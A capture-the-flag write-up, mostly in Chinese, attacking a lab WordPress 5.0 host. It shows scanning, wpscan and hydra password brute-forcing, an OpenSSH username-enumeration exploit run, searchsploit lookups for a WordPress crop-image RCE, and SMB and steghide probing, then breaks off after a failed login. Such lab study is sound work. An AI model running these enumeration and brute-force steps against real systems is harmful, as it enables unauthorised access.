Blog
Billy Joel made a Wordpress blog!
Kali Linux : 10.18.72.222
Target IP Address : 10.10.155.224
Task 1: Blog
Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!
Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole…
In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.
Credit to Sq00ky for the root privesc idea ;)
Billy Joel在他的家用电脑上创建了一个博客,并开始了工作。这将会非常棒!
枚举这个主机,并找到隐藏在其中的两个Flag!Billy的笔记本上发生了一些奇怪的事情。你能够灵活操作并获得你所需的东西吗?或者你会掉进兔子洞…
为了让博客与AWS一起工作,你需要将”blog.thm”添加到你的/etc/hosts文件中。
感谢Sq00ky提供root权限升级的思路 ;)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[~]
└─# cp /etc/hosts /etc/hosts.bak
┌──(root㉿kali)-[~]
└─# cat /etc/hosts.bak
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
┌──(root㉿kali)-[~]
└─# vim /etc/hosts
┌──(root㉿kali)-[~]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.155.224 blog.thm
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~]
└─# nmap -Pn 10.10.155.224
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 03:18 EDT
Nmap scan report for 10.10.155.224
Host is up (0.27s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 36.77 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿kali)-[~]
└─# nmap -Pn -p 22,80,139,445 -sC -sV 10.10.155.224
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 03:20 EDT
Nmap scan report for 10.10.155.224
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_ 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Billy Joel's IT Blog – The IT blog
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.0
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-� Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2023-08-01T07:21:12+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-08-01T07:21:12
|_ start_date: N/A
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.28 seconds
http://blog.thm/2020/05/26/note-from-mom/
发现两个可能的用户:Billy Joel、Karen Wheeler。
发现wordpress admin登录页面:/wp-admin/
数据库连接错误,只能重启实验室。
Kali Linux : 10.18.72.222
Target IP Address : 10.10.97.151
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
┌──(root㉿kali)-[~]
└─# wpscan --url 10.10.97.151
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.97.151/ [10.10.97.151]
[+] Started: Tue Aug 1 03:56:04 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.97.151/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.97.151/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.97.151/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.97.151/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.97.151/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.97.151/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.97.151/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:11 <==============================================================================================================> (137 / 137) 100.00% Time: 00:00:11
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Aug 1 03:56:26 2023
[+] Requests Done: 181
[+] Cached Requests: 5
[+] Data Sent: 43.089 KB
[+] Data Received: 20.263 MB
[+] Memory used: 220.25 MB
[+] Elapsed time: 00:00:21
发现WordPress version 5.0,找到对应exploit:WordPress 5.0.0 - Image Remote Code Execution
看使用文档,需要找到用户名和密码。利用WPScan执行Password brute force attack。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
┌──(root㉿kali)-[~]
└─# wpscan --url 10.10.97.151 -e u --passwords /usr/share/wordlists/metasploit/unix_passwords.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.97.151/ [10.10.97.151]
[+] Started: Tue Aug 1 04:17:00 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.97.151/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.97.151/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.97.151/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.97.151/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.97.151/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.97.151/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.97.151/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:05 <===============================================================================================================> (10 / 10) 100.00% Time: 00:00:05
[i] User(s) Identified:
[+] bjoel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.97.151/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] kwheel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.97.151/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Karen Wheeler
| Found By: Rss Generator (Aggressive Detection)
[+] Billy Joel
| Found By: Rss Generator (Aggressive Detection)
[+] Performing password attack on Xmlrpc against 4 user/s
Trying Billy Joel / vagrant Time: 00:14:38 <===========================================================================================================> (4036 / 4036) 100.00% Time: 00:14:38
[i] No Valid Passwords Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Aug 1 04:32:10 2023
[+] Requests Done: 4094
[+] Cached Requests: 8
[+] Data Sent: 2.064 MB
[+] Data Received: 2.85 MB
[+] Memory used: 157.762 MB
[+] Elapsed time: 00:15:09
发现了2个用户名bjoel、kwheel:
bjoel : Billy Joel
kwheel : Karen Wheeler
http://blog.thm/wp-login.php
Wordpress默认的登录凭据:
username : username
password : password
无效用户名
username : admin
password : password
无效用户名
尝试以下组合:
username : bjoel
password : password
密码错误
username : kwheel
password : password
密码错误
尝试暴力破解失败,太浪费时间了。
1
2
3
4
┌──(root㉿kali)-[~/Downloads]
└─# cat users.txt
bjoel
kwheel
1
2
┌──(root㉿kali)-[~/Downloads]
└─# wpscan --url 10.10.97.151 -U users.txt -P /usr/share/wordlists/rockyou.txt
OpenSSH 2.3 < 7.7 - Username Enumeration : CVE-2018-15473
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Downloads]
└─# searchsploit OpenSSH 7.6p1
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/Downloads]
└─# searchsploit -m 45233
Exploit: OpenSSH 2.3 < 7.7 - Username Enumeration
URL: https://www.exploit-db.com/exploits/45233
Path: /usr/share/exploitdb/exploits/linux/remote/45233.py
Codes: CVE-2018-15473
Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/Downloads/45233.py
上述代码在Python 3下无法运行,所以找了该exploit的Python 3版本。
exploit 45233.py fixed for python 3
1
2
3
4
┌──(root㉿kali)-[~/Downloads]
└─# python 45233.1.py
usage: 45233.1.py [-h] [--port PORT] [--threads THREADS] [--outputFile OUTPUTFILE] [--outputFormat {list,json,csv}] (--username USERNAME | --userList USERLIST) hostname
45233.1.py: error: the following arguments are required: hostname
1
2
3
┌──(root㉿kali)-[~/Downloads]
└─# python 45233.1.py --outputFile output.txt --userList users.txt 10.10.97.151
[+] Results successfully written to output.txt in List form.
1
2
3
4
┌──(root㉿kali)-[~/Downloads]
└─# cat output.txt
bjoel is a valid user!
kwheel is a valid user!
在目标SSH服务器上,有两个有效用户:bjoel、kwheel。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/Downloads]
└─# hydra -L users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://10.10.97.151
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-01 06:57:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2018 login tries (l:2/p:1009), ~127 tries per task
[DATA] attacking ssh://10.10.97.151:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 1891 to do in 00:15h, 15 active
[STATUS] 103.67 tries/min, 311 tries in 00:03h, 1708 to do in 00:17h, 15 active
[STATUS] 97.14 tries/min, 680 tries in 00:07h, 1339 to do in 00:14h, 15 active
[STATUS] 98.83 tries/min, 1186 tries in 00:12h, 833 to do in 00:09h, 15 active
[STATUS] 98.65 tries/min, 1677 tries in 00:17h, 342 to do in 00:04h, 15 active
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-01 07:18:28
SSH暴力破解失败。
http://10.10.97.151/wp-content/uploads/
看看Apache是否允许PUT方法。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~]
└─# nmap --script http-methods 10.10.97.151
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 07:09 EDT
Nmap scan report for blog.thm (10.10.97.151)
Host is up (0.26s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-methods:
|_ Supported Methods: GET HEAD POST
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 84.55 seconds
只支持GET HEAD POST。
没思路,看了一眼Lab的标签:cve-2019-8943
Wordpress: CVE-2019-8943: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.
WordPress: CVE-2019-8943: 路径限制不当导致受限目录的路径遍历 (‘路径遍历’)
WordPress版本5.0.3及以下版本中,wp_crop_image()函数存在路径遍历漏洞。攻击者(具有裁剪图像权限)可以通过在文件名中包含两个图像扩展名和../序列,例如以.jpg?/../../file.jpg为后缀的文件名,将输出图像写入任意目录。
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/Downloads]
└─# searchsploit --cve CVE-2019-8943
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Core 5.0 - Remote Code Execution | php/webapps/46511.js
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit) | php/remote/46662.rb
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/Downloads]
└─# searchsploit --cve CVE-2019-8943 -w
----------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Exploit Title | URL
----------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
WordPress Core 5.0 - Remote Code Execution | https://www.exploit-db.com/exploits/46511
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit) | https://www.exploit-db.com/exploits/46662
----------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)
WordPress Crop-image Shell Upload
WordPress Crop-image Shell Upload
This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. This exploit module only works for Unix-based systems currently.
WordPress裁剪图像Shell上传漏洞
该模块利用WordPress版本5.0.0和<= 4.9.8上的路径遍历和本地文件包含漏洞。裁剪图像功能允许具有至少作者权限的用户在上传过程中通过更改_wp_attached_file引用来调整图像大小并执行路径遍历。攻击的第二部分是通过在创建文章时更改_wp_page_template属性来将该图像包含在当前主题中。此漏洞利用模块目前仅适用于基于Unix的系统。
该模块也需要设置用户名和密码。所以应该如何寻找bjoel、kwheel用户的密码?
试试枚举Samba:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
┌──(root㉿kali)-[~]
└─# enum4linux -a -u bjoel 10.10.97.151
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Aug 1 08:35:14 2023
=========================================( Target Information )=========================================
Target ........... 10.10.97.151
RID Range ........ 500-550,1000-1050
Username ......... 'bjoel'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.97.151 )============================
[+] Got domain/workgroup name: WORKGROUP
================================( Nbtstat Information for 10.10.97.151 )================================
Looking up status of 10.10.97.151
BLOG <00> - B <ACTIVE> Workstation Service
BLOG <03> - B <ACTIVE> Messenger Service
BLOG <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 10.10.97.151 )===================================
[+] Server 10.10.97.151 allows sessions using username 'bjoel', password ''
================================( Getting domain SID for 10.10.97.151 )================================
Bad SMB2 (sign_algo_id=1) signature for message
[0000] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
[0000] 68 95 11 80 3C 6E 5B BA 23 10 AA EC 6E C4 FA 78 h...<n[. #...n..x
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup
===================================( OS information on 10.10.97.151 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.97.151 from srvinfo:
Bad SMB2 (sign_algo_id=1) signature for message
[0000] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
[0000] 8D B7 DF 7A 3B A3 46 90 44 04 C5 E1 39 FF DC 1C ...z;.F. D...9...
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.97.151 )=======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=================================( Share Enumeration on 10.10.97.151 )=================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
BillySMB Disk Billy's local SMB Share
IPC$ IPC IPC Service (blog server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BLOG
[+] Attempting to map shares on 10.10.97.151
//10.10.97.151/print$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.97.151/BillySMB Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.97.151/IPC$ Mapping: N/A Listing: N/A Writing: N/A
============================( Password Policy Information for 10.10.97.151 )============================
[+] Attaching to 10.10.97.151 using bjoel
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BLOG
[+] Builtin
[+] Password Info for Domain: BLOG
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[E] Failed to get password policy with rpcclient
=======================================( Groups on 10.10.97.151 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.97.151 via RID cycling (RIDS: 500-550,1000-1050) )==================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================( Getting printer info for 10.10.97.151 )===============================
Bad SMB2 (sign_algo_id=1) signature for message
[0000] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
[0000] CE 0F 02 31 39 6B 30 1D 20 73 E8 B8 FF 61 D1 3B ...19k0. s...a.;
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Tue Aug 1 08:36:07 2023
可以查看BillySMB Share!
1
2
3
4
5
Sharename Type Comment
--------- ---- -------
BillySMB Disk Billy's local SMB Share
//10.10.97.151/BillySMB Mapping: OK Listing: OK Writing: N/A
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kali)-[~/Downloads]
└─# smbclient //10.10.97.151/BillySMB -U bjoel
Password for [WORKGROUP\bjoel]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 1 05:45:02 2023
.. D 0 Tue May 26 13:58:23 2020
Alice-White-Rabbit.jpg N 33378 Tue May 26 14:17:01 2020
tswift.mp4 N 1236733 Tue May 26 14:13:45 2020
check-this.png N 3082 Tue May 26 14:13:43 2020
15413192 blocks of size 1024. 9779380 blocks available
smb: \> get Alice-White-Rabbit.jpg
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> get tswift.mp4
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \> get check-this.png
getting file \tswift.mp4 of size 1236733 as tswift.mp4 getting file \check-this.png of size 3082 as check-this.png (1.1 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \> put /root/Downloads/users.txt users.txt
putting file /root/Downloads/users.txt as \users.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
. D 0 Tue Aug 1 09:17:31 2023
.. D 0 Tue May 26 13:58:23 2020
Alice-White-Rabbit.jpg N 33378 Tue May 26 14:17:01 2020
tswift.mp4 N 1236733 Tue May 26 14:13:45 2020
users.txt A 13 Tue Aug 1 09:17:32 2023
check-this.png N 3082 Tue May 26 14:13:43 2020
15413192 blocks of size 1024. 9779376 blocks available
smb: \> quit
可以上传文件,也就是说可以上传一个reverse shell,或者是meterpreter shell。不过,到底上传到哪里了?以及如何执行该reverse shell?smbclient不能用于运行可执行文件,ssh才可以。
在Kali Linux中,你可以使用steghide工具来检查图像是否包含隐写术或隐藏信息。steghide是一个用于隐藏和提取隐写信息的命令行工具。要检查图像是否包含隐藏的信息,可以按照以下步骤进行:
- 安装steghide(如果尚未安装): 打开终端并输入以下命令来安装steghide:
1
2
sudo apt update
sudo apt install steghide
- 使用steghide检查图像:
假设你有一个名为
image.jpg的图像文件,并且想要检查是否有隐藏的信息,可以运行以下命令:
1
steghide info image.jpg
该命令将输出图像中是否包含隐藏的信息,如果有,它还将显示隐藏信息的一些基本信息,如隐藏数据的大小和加密密码(如果应用了加密)。
请注意,steghide只能检测使用steghide工具隐藏的信息,而无法检测其他隐写术。如果你怀疑图像中可能使用其他隐写术隐藏信息,可以考虑使用其他专门的隐写检测工具,如stegdetect、stegosuite等,以便更全面地分析图像。
根据steghide info的输出,这是一个JPEG图像文件,文件名为”Alice-White-Rabbit.jpg”。它的容量为1.8 KB。接下来,steghide询问你是否要尝试获取嵌入在图像中的隐藏信息。
在这里,steghide要求你输入密码(passphrase),因为通常情况下隐藏信息在嵌入时可能会使用密码进行加密。只有正确的密码才能成功提取隐藏的信息。如果你知道隐藏信息的密码,请输入密码并按下回车,steghide会尝试提取并显示嵌入在图像中的隐藏信息。
如果你不知道密码或没有权限进行隐写提取操作,可以选择不继续,并且信息将不会被提取。
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Downloads]
└─# steghide info Alice-White-Rabbit.jpg
"Alice-White-Rabbit.jpg":
format: jpeg
capacity: 1.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "rabbit_hole.txt":
size: 48.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
要查看rabbit_hole.txt文件的内容,你需要使用steghide extract命令来提取隐藏的文件,并且在提取过程中提供正确的密码(passphrase)。提取后,你可以通过文本编辑器或命令行查看文件的内容。
以下是提取rabbit_hole.txt文件的步骤:
- 提取隐藏文件: 在终端中输入以下命令,并按照提示输入正确的密码(passphrase):
1
steghide extract -sf Alice-White-Rabbit.jpg
-
输入密码: 输入与隐藏信息加密时使用的密码。
-
查看提取的文件: 提取成功后,
steghide将把rabbit_hole.txt文件保存在当前工作目录中。你可以使用文本编辑器(如nano或vim)来查看文件内容,或者使用cat命令在终端中查看文件内容:
1
cat rabbit_hole.txt
请注意,如果你没有正确的密码,是无法成功提取和查看隐藏文件的内容的。
此处提取隐藏文件的内容不需要密码。
1
2
3
4
┌──(root㉿kali)-[~/Downloads]
└─# steghide extract -sf Alice-White-Rabbit.jpg
Enter passphrase:
wrote extracted data to "rabbit_hole.txt".
1
2
3
┌──(root㉿kali)-[~/Downloads]
└─# cat rabbit_hole.txt
You've found yourself in a rabbit hole, friend.
所以说,Samba Share是一个rabbit hole。
Kali Linux : 10.18.72.222
Target IP Adress : 10.10.143.236
之前暴力破解密码文件没选对,应该使用rockyou.txt。
请求登录数据包
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
POST /wp-login.php HTTP/1.1
Host: blog.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://blog.thm
Connection: close
Referer: http://blog.thm/wp-login.php
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
log=kwheel&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1
登陆失败,ERROR提示:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
